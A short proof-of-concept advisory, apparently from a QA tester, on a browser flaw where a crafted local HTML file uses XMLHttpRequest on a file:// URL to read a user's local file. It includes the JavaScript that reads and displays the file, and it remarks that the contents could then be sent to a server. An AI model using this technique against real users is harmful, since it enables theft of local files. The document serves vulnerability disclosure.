.html can be crafted to force a unaware user to read file from local, and then
possibly send it to a server.
var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)
This type of request is possible if file is on user local in the user hard
disk (CHROME2), in other browser I was able to do the same but with a LAN
access to file, no need to write in local hard disk (SAFARI3)
if (xmlhttp != null) {
xmlhttp.open( method, URL, true)
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4) {
alert(URL + "\n\n" + xmlhttp.responseText)
}
}
}
this is a valid operation javascript can read then xmlhttp.responseText, yes
the file content.
After this you can do whatever you want whit the file.
note that you MUST know the file path!!
crafted by: federico.lanusse
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company: clarolab QA team
yeah! lets rock Ateam!!
Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671